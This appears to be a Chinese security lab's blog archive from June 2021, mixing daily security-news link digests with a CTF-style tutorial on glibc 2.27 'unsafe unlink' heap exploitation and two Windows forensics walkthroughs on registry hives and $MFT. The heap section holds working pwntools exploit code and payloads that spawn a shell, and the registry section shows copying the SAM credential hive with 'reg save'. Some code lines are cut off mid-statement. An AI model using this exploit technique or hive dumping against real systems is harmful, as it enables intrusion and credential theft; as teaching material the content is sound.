网络安全日报 2021年06月28日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Crackonosh挖矿恶意软件感染了超22W台Windows系统
https://securityaffairs.co/wordpress/119450/malware/crackonosh-monero-miner.html
2、 黑客利用Cisco ASA XSS漏洞进行攻击
https://securityaffairs.co/wordpress/119442/hacking/cisco-asa-under-attack.html
3、微软发现与俄有关的 SolarWinds 黑客入侵了三个新实体
https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html
4、Hive勒索软件泄露了 Altus Group 公司数据
https://securityaffairs.co/wordpress/119418/cyber-crime/new-ransomware-group-hive-leaks-altus-group-sample-files.html
5、FortiWeb WAF修复了一个任意命令执行高危漏洞
https://securityaffairs.co/wordpress/119387/security/fortinet-fortiweb-waf-flaw.html
6、黑客利用 3 年前的漏洞擦除WD设备的数据
https://securityaffairs.co/wordpress/119392/iot/hackers-wipe-western-digital-devices.html
7、梅赛德斯-奔驰批量数据泄露
https://securityaffairs.co/wordpress/119436/data-breach/mercedes-benz-data-breach.html
8、攻击者利用ReverseRat针对南亚和中亚能源组织
https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/
9、攻击者可以利用One-Click攻击劫持Atlassian账户
https://thehackernews.com/2021/06/one-click-exploit-could-have-let.html
10、超过8亿条与WordPress用户相关的记录被泄露
https://www.infosecurity-magazine.com/news/cloud-database-exposes-800m/
堆利用之unsafe unlink
漏洞简介
glibc库中存在着unsafe unlink漏洞。主要原理是利用释放块时存在的安全检查缺陷,通过修改堆块的元数据信息,从而在free时修改堆指针。利用这一漏洞可以完成一次任意写操作。
本文以libc-2.27.so为例,结合一道pwn题目来介绍利用过程。
本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECIDc271-da53-4bd3-9b61-d59c3b9d3407 (本节课主要讲解objdump命令的使用和c语言函数调用约定,学会利用栈溢出漏洞改写函数指针变量和覆盖返回地址。)
程序checksec检查
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
题目源码分析
int main(){
int choice = 0; prepare();
while(1) {
choose_action(&choice);
switch (choice) {
case 1:
squeeze();
break;
case 2:
wash();
break;
case 3:
display();
break;
case 4:
mix();
break;
case 5:
insepct();
break;
default:
puts("Nah... You just cannot do this :( ");
exit(0); } } return 0;}
主函数是菜单,choose_action只是简单读入整数以进行选择,此处不再赘述。
void squeeze(){ int i; struct palette* tmp; for(i = 0; i < COLOR_NUM; i++) { if (!your_palette[i]) { puts("Found some free space for you!"); break; } } if (i == COLOR_NUM) { puts("Your palette is full :("); exit(0); } tmp = mallo
squeeze函数用于申请新的块,并调用自定义make_component函数读入用户输入。其中your_palette及相关变量定义如下:
#define COLOR_NUM (4)#define COLOR_NAME (0x20)#define COLOR_COMPONENT (0x4d8) struct palette { char color[COLOR_NAME]; char ingredient[COLOR_COMPONENT];}*your_palette[COLOR_NUM]; long secret_button = 0;
make_component函数定义如下。该函数根据传入的长度,逐字节读入用户输入,检测到换行符或是达到最大长度后即把最后一个字符改为’\0’。
void make_component(char* ptr, int len){ if (0 == len) { return; } char c; int i = 0; while ( i < len ) { read(0, &c, 1); if ( c == '\n' ) { ptr[i] = 0; return; } ptr[i++] = c; } ptr[i] = 0;}
乍看之下没有什么问题,但是当读入的数据达到最大长度后会将ptr[len]处的数据修改为0,而这一地址属于理想的修改范围之外,因此产生off-by-null的漏洞。
void mix(){ int index; puts("Now input the color index:"); scanf("%d", &index); index--; if (0 <= index && index < COLOR_NUM) { if (your_palette[index]) { struct palette* ddl_ptr = your_palette[index]; puts("Please name youe color:"); make_comp
mix函数用于修改已经申请好的chunk,可以重新设置某一个palette的color段以及ingredient段。
void wash(){ int index; puts("Now input the color index:"); scanf("%d", &index); index--; if (0 <= index && index < COLOR_NUM) { if (your_palette[index]) { free(your_palette[index]); your_palette[index] = NULL; puts("Finish!"); retur
wash函数free掉了一个已经申请过的chunk,这也是unsafe unlink漏洞利用之处。这里需要注意的一点是标红处对数组进行赋NULL,因此排除了uaf的情况。
void insepct(){ if (secret_button) { puts("You've successfully broken the palette >_< "); system("/bin/sh"); } else { puts("You can explore your palette futher more :) "); } exit(0);}
inspect函数用于shell获取。当检查到全局变量secret_button不为0后,将调用/bin/sh。那么本题的目标至此已经显而易见了:通过wash函数的free触发漏洞,并通过mix函数修改全局变量secret_button为非零值,然后执行inspect函数来getshell。
相关知识补充
unsafe unlink漏洞是指由于程序设计不当、用户恶意输入,堆管理器在释放块的时候将前一个正在使用的块也视为已经被释放的块,从而也将它纳入空闲块管理中。以64位系统中glibc-2.27为例,一个chunk块的结构如下:
A区域(8字节):mchunk_prev_sizeB区域(8字节):mchunk_sizeC区域(8字节):fdD区域(8字节):bkE区域(8字节):fd_nextsizeF区域(8字节):bk_nextsizel 其中B区域比较特殊。B区域用于表示该chunk的大小(单位为字节)。由于chunk必须16字节对齐,因此B区域的低3bits被设置为flag位,不影响chunk的大小。其中最低1bit为PREV_INUSE位,当设置为0时表示前一个chunk处于空闲状态。
l A区域用于表示前一个相邻的空闲chunk的大小。当PREV_INUSE置1时,这一区域被前一个chunk使用(称之为空间复用);当PREV_INUSE置0时,该区域才被这一个chunk使用,用于在free时获取前一个chunk的地址。
l B区域也是该chunk的元数据区域,从C区域开始为用户实际使用的数据区。当malloc获得块的时候,返回的指针就是指向C区域的。
l 而当该块处于空闲状态时,C、D区域用于构造空闲块的双向链表。C区域会被堆管理器自动设置为前向空闲块的地址,D区域被设置为后向空闲块的地址。对于large chunk而言,C、D区域用于指向大小相同的空闲块,E、F区域用于指向大小不同的空闲块。
glibc-2.27中对unlink的实现如下:
/* Take a chunk off a bin list */#define unlink(AV, P, BK, FD) { \ if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \ malloc_printerr ("corrupted size vs. prev_size"); \ FD = P->fd; \ BK = P->bk; \
unlink是在释放某一块时调用的“函数”,本意是将空闲块进行合并形成双向链表,提高空间利用率,但是在安全检查方面存在一些漏洞。在利用过程中,需要绕过两处安全检查(标红和标蓝处)。简单来说,unlink的核心是检查当前块是否是合法的空闲块。其中参数P表示当前检查的、准备合并的“空闲”块。
l 标红处用于检查P的大小是否和下一块的prev_size段相等(即检查此块的B区域表示的大小和下一块的A区域的值是否相等)。
l 标蓝处用于检查P的前向块的后向块与P的后向块的前向块是否都指向P自己。
当两处检查均通过时,堆管理器会执行FD->bk = BK与BK->fd = FD,从而将P加入到双向链表中。因此,本题的核心在于如何绕过这两处检查。
漏洞利用
利用思路大致如下:
1、申请3个块(姑且称之为chunkA、chunkB、chunkC)。
2、修改chunkA,在其中精巧地布置出一个chunkD。
3、释放chunkB,并让堆管理器unlink chunkD。
4、修改chunkA,写入任意地址。
5、修改chunkA,实现任意地址写。
ADD, FREE, SET, INSPECT = '1', '2', '4', '5'def operate(op, arg1='A', arg2='A', arg3='A'): global io io.recvuntil('e:\n') io.sendline(op) if op == '1': # squeeze() io.recvuntil('color:\n') if len(arg1) < 32: io.sendline(arg1) else: io.se
首先定义一个operate函数,用于处理各类请求信息,将squeeze、wash、mix重命名为经典的ADD、FREE、SET。接下来逐步进行利用:
1、申请3个块(姑且称之为chunkA、chunkB、chunkC)。
operate(ADD) #chunkAoperate(ADD) #chunkBoperate(ADD) #chunkC
使用gdb查看内存情况:
之所以使用3个chunk,是为了防止free chunkB的时候其与top chunk合并。
然后以chunkA为例,查看它的内容:
可见该chunk大小为0x500、前一个chunk处于使用中。(之后的截图为多次运行程序所截,由于开启了ASLR,所以堆的地址会发生改变,但内容是一致的,不影响阅读)
2、修改chunkA,在其中精巧地布置出一个chunkD。
chunkD是在chunkA内由用户的输入构造出的特殊的fake chunk,我们希望unlink把这个块视作一个合法的空闲块。因此首先需要绕过unlink对chunk_size的检查。这里需要注意,用户申请的chunkA指向chunkA的data段,我们可以将这里当做chunkD的元数据区进行填充。由于chunkA->color大小为32字节,那么对应了chunkD的A、B、C、D区域(前文所述)。如何填充这四个区域呢?
首先关注B区域。由于chunkD是chunkA内的一块,且其元数据区的地址在chunkA的数据区,所以它的大小应该是chunkA-16,即0x500-0x10=0x4f0。为了防止chunkA也被unlink掉,这里将前一块标记为使用中,所以B区域填充0x4f1。那么A区域是属于chunkA的,可以填充任意值,此处填0。
C、D区域是chunkD的fd、bk指针,是漏洞利用的关键。这里注意到unlink的第二道检查就是检查这里的fd->bk和bk->fd是否都等于chunkD的元数据区地址。这里的关键是chunkD的元数据区地址恰好等于chunkA的数据区地址,而chunkA的数据区地址正好是malloc chunkA时获得的,其保存在全局变量your_palette[0]中。
由于程序没有开启PIE,所以可以通过objdump直接获取全局变量的地址。
这里就利用了unlink中的一个漏洞:它默认fd和bk都指向了合法的chunk地址,所以fd->bk和bk->fd只是简单地将fd、bk视作一个chunk,然后取偏移量24字节和16字节,并将其视为合法的bk和fd。而如果fd、bk是用户可控的,那么只需要将fd设置为your_palette地址-24、将bk设置为your_palette地址-16,那么fd->bk和bk->fd都会指向your_palette[0],即为chunkA的data段,即为chunkD的元数据地址,从而实现了绕过检查。此时0x1160670为chunkD的元数据地址,chunkD的fd、bk被设置为0x6020c
接下来需要填充chunkD的ingredient区域。这里需要注意的是要在空间复用区(即chunkB的A区域)填充padding与chunkD的大小。这里需要完全填充ingredient区域,以触发前文提到过的off-by-null漏洞,从而将chunkB的PREV_INUSE位置0,使得chunkD被视作空闲块。
可见0x1160b68处的0x501被修改为0x500,且其prev_size段被设置为0x4f0。
palette_addr = 0x6020c0secret_button_addr = 0x6020a0payload1 = p64(0) + p64(0x4f1) + p64(palette_addr - 24) + p64(palette_addr - 16)payload2 = b'\x00' * 0x4d0 + p64(0x4f0)operate(SET, 1, payload1, payload2)
3、释放chunkB,并让堆管理器unlink chunkD。
释放掉chunkB后,查看your_palette内容,可见your_palette[0]被设置为0x6020a8,这是因为unlink成功,执行了BK->fd = FD。这里注意到,chunkA仍然是一个使用中的chunk,但它指向了全局数据区。那么此后调用mix时,将向此处写入新的数据。这里需要注意到,写入的第24-32字节会重新覆盖your_palette[0],也就是说可以再次指向另一个地址,而这个地址就是用户任意写入的了。
operate(FREE,2)
4、修改chunkA,写入任意地址。
这里直接写入secret_button的地址,并调用mix函数。
payload = b'\x00' * 24 + p64(secret_button_addr)operate(SET, 1, payload)
5、修改chunkA,实现任意地址写。
secret_button只需非0即可,这里写入1。
operate(SET, 1, p64(1))
最后简单调用inspect即可getshell。
完整exp代码
from pwn import * binary_file = './a.out'io = process(binary_file, env={'LD_PRELOAD': './libc-2.27.so'})lib = ELF('./libc-2.27.so')proc = ELF(binary_file) palette_addr = 0x6020c0secret_button_addr = 0x6020a0button = 1ADD, FREE, SET, INSPECT = '1', '2', '4', '5' def operate(op, arg1='A', arg2='A', a
说明
编译源程序:gcc unsafe_unlink.c -no-pie
网络安全日报 2021年06月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Dell BIOSConnect 功能中的严重漏洞影响128 款设备
https://securityaffairs.co/wordpress/119369/security/dell-biosconnect-flaws.html
2、VMware 修复Carbon Black App Control中严重漏洞
https://securityaffairs.co/wordpress/119362/security/vmware-carbon-black-app-control-flaw.html
3、Zyxel 警告客户防范针对其防火墙和VPN设备的攻击
https://securityaffairs.co/wordpress/119351/hacking/zyxel-firewall-vpn-attacks.html
4、PYSA勒索软件团伙使用ChaChi RAT针对教育组织
https://securityaffairs.co/wordpress/119338/malware/chachi-rat-us-schools.html
5、谷歌宣布扩展其开源漏洞数据库(OSV)
https://www.securityweek.com/google-expands-open-source-vulnerabilities-database
6、 Atlassian 严重漏洞可导致帐户被劫持
https://thehackernews.com/2021/06/one-click-exploit-could-have-let.html
7、网络钓鱼活动利用PDF窃取用户Office365凭据
https://cofense.com/blog/security-update-phishing-pdf/
8、美国塔尔萨遭勒索软件攻击泄露超过1.8万份文件
https://edition.cnn.com/2021/06/23/us/tulsa-cyberattack-personal-information-dark-web/index.html
9、网络安全公司联手对抗 DMCA 有争议的部分
https://www.securityweek.com/cybersecurity-companies-join-forces-against-controversial-dmca-section
10、谷歌将逐步淘汰cookie跟踪技术计划推迟 2 年
https://www.securityweek.com/google-delays-phase-out-tracking-tech-nearly-2-years
Windows 取证之注册表
一、概述
注册表(英语:Registry)是Microsoft Windows操作系统和其应用程序中的一个重要的层次型数据库,用于存储系统和应用程序的配置信息。
早在Windows 3.0推出OLE技术的时候,注册表就已经出现。但是,从Windows 95开始,注册表才真正成为Windows用户经常接触的内容,并在其后的操作系统中继续沿用至今。随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统。(via 维基百科)
二、注册表的组成结构
注册表由键(key,或称“项”)、子键(subkey,子项)和值项(value)构成的hive文件组成,关于Windows注册表hive格式的详情说明可以参考这篇文章:https://github.com/msuhanov/regf/blob/master/Windows%20registry%20file%20format%20specification.md
注册表的结构是一个树状结构,一个键(key,或称“项”)就是一个节点,子键(subkey)就是这个节点的子节点,子健也是键。键的一条属性被称为一个value(值项),value由名称、类型、数据类型和数据组成。一个键可以有多个值,每个值的名称不同,如果值名称是空,则该值为该键的默认值。
可以打开注册表编辑器查看其结构组成:
注册表的主键,也就是主分支有五个,分别是:
HKEY_CLASSES_ROOT:包含启动应用程序所需的全部信息,包括扩展名,应用程序与文档之间的关系,驱动程序名,DDE和OLE信息,类ID编号和应用程序与文档的图标等。
HKEY_CURRENT_USER:包含当前用户的配置信息,比如环境变量,桌面设置等
HKEY_LOCAL_MACHINE:包括安装在计算机上的硬件和软件的信息
HKEY_USERS:包含计算机的所有用户配置信息
HKEY_CURRENT_CONFIG:当前硬件的配置信息。
注册表数据类型主要有以下几种:
REG_SZ:字符串类型,文本字符串
REG_BINARY:二进制类型,不定长度的二进制值,以16进制形式显示
REG_DWORD:双字,32 位的二进制值,显示为 8 位的十六进制值
REG_MULTI_SZ:多字符串,有多个文本值的字符串,字符串间用 nul 分隔、结尾两个 nul
REG_EXPAND_SZ:可扩展字符串,包含环境变量的字符串
注册表中时间格式有以下几种:
FILETIME:64位值,代表间隔多少个单位为100纳秒的时间(从UTC1601年1月1日开始)
Unix Time:32位值,代表间隔多少秒(从UTC1970年1月1日开始)。
DOS Date/Time:两个16位值,详细记录了当地时间和年月日。
三、注册表的存储
注册表在Windows NT操作系统中被分为多个文件存储,这些文件被称为Registry Hives,每一个文件被称为一个配置单元。
主要配置单元有:
SYSTEM:对应的注册表分支为HKEY_LOCAL_MACHINE\SYSTEM,对应的存储文件是\Windows\System32\config\SYSTEM,其作用是存储计算机硬件和系统的信息。
NTUSER.DAT:对应的注册表分支是HKEY_CURRENT_USER,存储在用户目录下,与其他注册表文件是分开的,主要用于存储用户的配置信息。
SAM:分支是HKEY_LOCAL_MACHINE\SAM,存储在C:\Windows\System32\config\SAM文件中,保存了用户的密码信息。
SECURITY:对应的分支HKEY_LOCAL_MACHINE\SECURITY,存储在C:\Windows\System32\config\SECURITY文件中,保存了安全性设置信息。
SOFTWARE:分支是HKEY_LOCAL_MACHINE\SOFTWARE,文件存储在C:\Windows\System32\config\SOFTWARE中,保存安装软件的信息。
修改注册表的主要方式有:1、使用提供Windows提供的注册表编辑器:%systemroot%\regedit.exe;2、使用reg命令,可以对注册表进行增删改查、导入导出注册表文件(reg文件)、导入导出或加载配置单元(RegHive)等操作;3、使用reg文件,用户可以通过注册表编辑器导出注册表某些项为一个reg文件,反之可以导入一个reg文件将项目还原或者修改。
此外,为了防止注册表出错和损坏,Registry hives还包括注册的事务日志文件和注册表的备份文件。事务日志文件名与注册表文件一致,且在同一个路径中,只是后缀不同。事务日志文件以.LOG为后缀,多个日志后缀会显示LOG1、LOG2这样。(如果要查看这些日志文件,需要打开文件夹选项,取消勾选“隐藏受保护的操作系统文件”)
备份文件则在\Windows\System32\config\RegBack\路径中。
在发生修改将数据写入到主文件之前,Hive写入器会先将这些数据存储在事务日志文件中,如果写入事务日志时发生错误(比如系统崩溃),则主文件不会受影响。如果写入主文件时发生错误,可以通过事务日志包含的数据恢复主文件。
四、获取和分析Hive
要获取Hive,可以通过reg save命令创建Registry Hives的副本。(在管理员权限的命令提示符中执行)
C:\WINDOWS\system32>reg save hklm\sam c:\sam
操作成功完成。
C:\WINDOWS\system32>
分析Hive可以使用开源软件RegRipper,RegRipper是一个用perl编写的开源工具,可以从注册表中提取和解析各种信息(Key、value、data)以供取证人员进行分析。
RegRipper项目地址:https://github.com/keydet89/RegRipper3.0
打开RegRipper软件,选择Hive文件,设置好报告存储路径,选择好Profile,然后点Rip It
它会创建两个文件,一个是日志文件,一个是报告文件
打开SAM hive的分析报告文件,可以看到用户和用户组的详细信息
五、取证实战
来源:Cynet应急响应挑战赛
题目描述:Podrick 说在2020 年 2 月 3 日午餐时间(下午 12:00 左右),有一个恶意的 USB 设备插入了他的电脑。他还提到他看到他的一位同事——Theon G,手里拿着 USB设备离开了他的办公室。但Theon 声称他进入办公室是为了拜访 Aria(与Podrick在同一办公室)。见Aria不在,他便离开了办公室。Podrick没有锁屏的习惯,他怀疑Theon趁他不在的时候窃取了他的数据。
提示:1、检查Podrick的电脑;2、确定2020年2月3日,是否有USB设备连接到Podrick的PC?;3、提交可疑 USB 设备的Serial/UID
题目提供的文件是几个Hive文件
这些文件代表什么,在前面的小节中都已经介绍过了,除了Amcache.hve,这是Win8及更高版本的系统才有的。它存储与执行程序相关的信息,当用户执行某些操作(例如运行基于主机的应用程序、安装新应用程序或从外部设备运行便携式应用程序)时,它会记录程序相关的信息:如程序的创建时间、修改时间、名称、描述、程序厂商和版本、程序的执行路径、SHA-1哈希值等。即使程序从系统中删除,这些信息依然存在。
回到题目,我们要调查USB使用痕迹,根据前面的知识,我们需要分析SYSTEM这个Hive文件。
打开RegRipper工具,加载提供的SYSTEM文件,导出分析报告。
打开报告文件,通过搜索USBSTOR(这个key(SYSTEM\CurrentControlSet\Enum\USBSTOR)存储了任何曾经连接过系统的USB设备的产品信息和设备ID),可以找到有关USB设备的注册表信息。
通过查找和筛选比对,最终我们找到2020-12:12:32有一个USB设备插入了电脑,Serial/UID是: 4C530000281008116284
参考资料:
Registry Hives - Win32 apps | Microsoft Docs https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-hives
注册表 - 维基百科,自由的百科全书 https://zh.wikipedia.org/wiki/%E6%B3%A8%E5%86%8C%E8%A1%A8
regf/Windows registry file format specification.md at master · msuhanov/regf · GitHub https://github.com/msuhanov/regf/blob/master/Windows%20registry%20file%20format%20specification.md
本文涉及相关实验:FastIRCollector:https://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2016100814354600001 (FastIR Collector是一个Windows下的取证/信息收集工具,收集的东西揽括了所有你能想到的东西,不限于内存,注册表,文件信息等。本实验将介绍FastIR Collector在windows 7下的使用。)
网络安全日报 2021年06月24日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、与巴基斯坦有关的黑客攻击印度电力公司
https://thehackernews.com/2021/06/pakistan-linked-hackers-targeted-indian.html
2、Linux Pling Store 中未修补的漏洞可能导致供应链攻击
https://thehackernews.com/2021/06/unpatched-critical-flaw-affects-pling.html
3、Revil勒索软件代码被竞争对手窃取
https://threatpost.com/revil-ransomware-code-rivals/167167/
4、VMware修复了VMware Tools for Windows权限提升漏洞
https://securityaffairs.co/wordpress/119294/security/vmware-fixes-privilege-escalation-issue-in-vmware-tools-for-windows.html
5、Palo Alto 修复了 Cortex XSOAR产品中关键漏洞
https://securityaffairs.co/wordpress/119276/security/palo-alto-networks-cve-2021-3044-cortex-xsoar.html
6、受疫情影响,针对游戏行业和玩家的黑客攻击激增
https://www.securityweek.com/games-gaming-and-gamers-are-rapidly-growing-target-hackers
7、网络犯罪分子以Covid-19疫苗接种计划进行网络钓鱼部署恶意软件
https://cyware.com/news/a-covid-19-themed-campaign-delivering-agent-tesla-d5779a3f
8、Lexmark打印机中存在一个任意代码执行漏洞
https://threatpost.com/lexmark-printers-code-execution-zero-day/167111/
9、SonicWall VPN应用中已修补的漏洞仍存在问题
https://thehackernews.com/2021/06/sonicwall-left-vpn-flaw-partially.html
10、亚太互联网络信息中心由于配置错误数据泄露
https://portswigger.net/daily-swig/asia-pacific-internet-registry-apnic-says-whois-admin-passwords-were-mistakenly-exposed-for-three-months
网络安全日报 2021年06月23日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、新型勒索软件DarkRadiation针对Linux和Docker容器
https://securityaffairs.co/wordpress/119256/uncategorized/wormable-bash-darkradiation-ransomware.html
2、恶意PyPI包劫持开发人员设备进行挖矿活动
https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-hijack-dev-devices-to-mine-cryptocurrency/
3、Tor 浏览器修补通过已安装应用追踪用户的漏洞
https://www.securityweek.com/tor-browser-patches-application-probing-vulnerability
4、DirtyMoe 僵尸网络在2021年上半年已感染超10W个Windows系统
https://securityaffairs.co/wordpress/119230/malware/dirtymoe-botnet-growing.html
5、研究人员开发DroidMorph工具,可创建Android应用克隆(恶意/良性)
https://securityaffairs.co/wordpress/119206/malware/droidmorph-tool-generates-android-malware-clones-that.html
6、比利时列日市政府IT网络遭受勒索软件攻击
https://securityaffairs.co/wordpress/119240/malware/city-of-liege-ransomware.html
7、MITRE 将NSA开发的 D3FEND 防御策略知识库添加到 ATT&CK 框架
https://www.securityweek.com/mitre-adds-d3fend-countermeasures-attck-framework
8、Zephyr 的蓝牙 LE 堆栈中多个漏洞可能导致 DoS 攻击、信息泄露
https://www.securityweek.com/vulnerabilities-zephyrs-bluetooth-le-stack-may-lead-dos-attacks
9、电子邮件服务器软件Dovecot高危漏洞可导致消息侦听、凭据盗窃
https://threatpost.com/email-bug-message-snooping-credential-theft/167125/
10、研究人员设计了一种对抗人脸识别的攻击-ADVERSARIAL OCTOPUS
https://securityaffairs.co/wordpress/119248/hacking/adversarial-octopus-facial-recognition.html
网络安全日报 2021年06月22日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Ragnar Locker 发布了700GB从ADATA窃取的数据
https://securityaffairs.co/wordpress/119196/cyber-crime/ragnar-locker-ransomware-adata.html
2、军情五处因担心安全风险没收了约翰逊的手机
https://securityaffairs.co/wordpress/119174/security/mi5-seized-boris-johnson-phone.html
3、NSA 发布保护企业通信系统的指南
https://www.securityweek.com/nsa-releases-guidance-securing-enterprise-communication-systems
4、Nvidia Jetson Soc框架存高危漏洞可导致DoS攻击和数据窃取
https://threatpost.com/nvidia-jetson-chipset-dos-data-theft/167093/
5、Wire Messaging App 高危漏洞可导致用户帐号被完全控制
https://portswigger.net/daily-swig/xss-flaw-in-wire-messaging-app-allowed-attackers-to-fully-control-user-accounts
6、北约使用的云平台被入侵和盗取数据
https://news.softpedia.com/news/nato-s-cloud-platform-has-been-hacked-533282.shtml
7、Google App 漏洞可被用于从设备中窃取个人数据
https://techcrunch.com/2021/06/17/a-security-bug-in-googles-android-app-installed-on-billions-of-devices-put-user-data-at-risk/
8、研究人员发现iCloud忘记密码功能可通过大规模并发连接实现爆破
https://thezerohack.com/apple-vulnerability-bug-bounty
9、Zoll修补除颤器管理软件中的多个高风险漏洞
https://portswigger.net/daily-swig/healthcare-vendor-zoll-patches-high-risk-vulnerabilities-in-defibrillator-management-software
10、网络安全公司Cognyte暴露50亿条数据泄露记录
https://www.hackread.com/cybersecurity-firm-expose-data-breach-records/
网络安全日报 2021年06月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、APT 组织 Kimsuky 利用 VPN 漏洞入侵了韩国核研究机构 KAERI
https://securityaffairs.co/wordpress/119147/apt/kimsuky-apt-hacked-south-korea-kaeri.html
2、美国连锁超市 Wegmans 披露数据泄露
https://securityaffairs.co/wordpress/119115/data-breach/wegmans-discloses-data-breach.html
3、专家发现 Cisco Small Business 220 系列产品多个漏洞
https://securityaffairs.co/wordpress/119108/security/cisco-small-business-220-flaw.html
4、游轮运营商嘉年华披露电子邮件账户数据泄露事件
https://securityaffairs.co/wordpress/119102/data-breach/carnival-security-breach.html
5、最近的Akamai 中断是因 Prolexic DDoS 保护服务的问题引起的
https://securityaffairs.co/wordpress/119094/security/akamai-outage-akamai-bug.html
6、研究人员发现iPhone新漏洞可永久破坏其WiFi功能
https://securityaffairs.co/wordpress/119157/hacking/iphone-bug-wifi-connectivity.html
7、波兰称最近的网络攻击来自俄罗斯
https://www.securityweek.com/major-cyberattack-poland-came-russian-territory-kaczynski
8、攻击者利用谷歌文档发送钓鱼链接窃取用户凭据
https://www.avanan.com/blog/attackers-take-advantage-of-new-google-doc-exploit?hs_preview=yDruqEUZ-48384993709
9、数十万Netflix和Disney+的账户在暗网售卖
https://www.technadu.com/hundreds-thousands-netflix-disney-plus-accounts-purchase-dark-web/284336/
10、GitLab修复了严重的SSRF漏洞
https://portswigger.net/daily-swig/gitlab-fixes-serious-ssrf-flaw-that-exposed-orgs-internal-servers
Windows 取证之$MFT
一、什么是MFT
MFT,全称Master File Table,即主文件表,它是NTFS文件系统的核心。它是包含了NTFS卷中所有文件信息的数据库,在$MFT 中每个文件(包括MFT本身)至少有一个MFT,记录着该文件的各种信息。这些信息被称为属性。
NTFS使用MFT条目定义它们对应的文件,有关文件的所有信息,比如大小、时间、权限等都存在MFT条目中,或者由MFT条目描述存储在MFT外部的空间中。
MFT由一个个MFT项(也称为文件记录(File Record))组成,每个MFT项占用1024字节的空间。这个概念相当于Linux中的inode,File Record在$MFT文件中物理上是连续的,且从0开始编号,每个MFT项的前部几十个字节有着固定的头结构,用来描述本MFT项的相关信息。后面的字节存放着“属性”。(-via 百度百科)
二、MFT与数据恢复
在正常情况下,MTF条目会随着文件添加到NTFS卷中而增加,因此MFT的大小也会增加,当文件从NTFS卷中删除时,其MFT条目会被标记为free(空闲),以准备被重复使用,此条目会继续存在,直到它被新文件覆盖。但MFT所占空间大小不会因为删除文件而缩小。
例子:假如现在有100个MFT条目和一个文件X,现在删除文件X并立即创建500个以上文件,那么文件X的MFT条目将会被覆盖。虽然文件的内容可能存在与硬盘上,但包含名称、元数据等的MFT条目将被覆盖。
例子2:现在MFT有10000个条目,删除1000个文件和立即添加2个新文件。此时,可以恢复998个条目。不过文件的数据是否可以恢复得看它们是否已被覆盖。
这种文件数据和MFT条目分开的方式,会导致在删除操作后存在以下几种可能性:
1、文件被删除,但MFT条目和文件数据是100%可恢复的,则删除的文件可以100%被恢复。
2、文件被删除,MFT条目可恢复,但部分文件数据被覆盖,则该文件部分可被恢复。
3、文件被删除,MFT条目可恢复,但是文件数据被100%覆盖,则该文件不可恢复,但该文件相关属性信息(名称、日期、大小等信息)可被恢复。
4、文件被删除,MFT条目和文件数据100%可恢复,但文件已100%丢失,这种情况下。取证调查可以揭示该文件的大量信息,但不是通过MFT,而是使用其他证物。
5、文件被删除且MFT100%被覆盖,但文件数据未100%被覆盖。剩余的文件可以从磁盘上未分配的空间恢复。但雕刻数据的结果取决于碎片、可恢复数据的数量(可能是100%)和文件的性质。
当然,MFT被覆盖时,存在非100%被覆盖的情况,这种情况被称为MFT文件松弛,标准上来说,MFT条目被分配1024字节的固定空间。如果MFT条目小于1024字节。比如1000字节,则剩下为额外松弛空间。比如一个只有200字节长的密码文件,其文件数据也会被放置在MFT内,这种文件数据称为常驻数据。而文件名称、日期等元数据只占用大约500字节左右,如果删除了文件并在其位置创建了新的MFT条目,且不包括常驻数据。这意味着即使这个文件被删除,如果仔细检查也能恢复。
三、$MFT文件在取证中的应用
题目来源:Cynet应急响应挑战赛
题目描述:GOT公司的CTO在自己的笔记本上发现了可疑的活动。他说桌面上某些文件突然被移动了位置,而且其他文件似乎还在不合逻辑的日期被修改。他希望我们找出桌面上文件异常的相关证据。通过 一些技术检查,我们发现他是对的。桌面文件有明显的异常痕迹。请根据提供的$MFT文件找到与文件更改/修改相关的异常痕迹。
提示:1、找出受攻击者影响的文件名称及其原始创建时间。2、该文件位于桌面上。3、时间格式:DD-MM-YYYY HH:MM:SS ,文件名格式:filename.ext(ext是文件扩展名)
下载题目提供的文件
用Winhex打开可以查看其组成结构
我们可以通过$MFT解析软件把MFT条目导出来
Mft2Csvhttps://github.com/jschicht/Mft2Csv
下载打开软件,选择$MFT文件,然后导出到csv文件
导出的条目会以csv文件的形式存放在软件目录下
打开导出的csv文件,就可以看到文件的名称,日期,权限等各种信息
我们找到桌面上的相关文件
通过筛选,我们把要找的文件锁定在19个相关文件内容中
通过观察比较,发现其中一个文件时间有异常
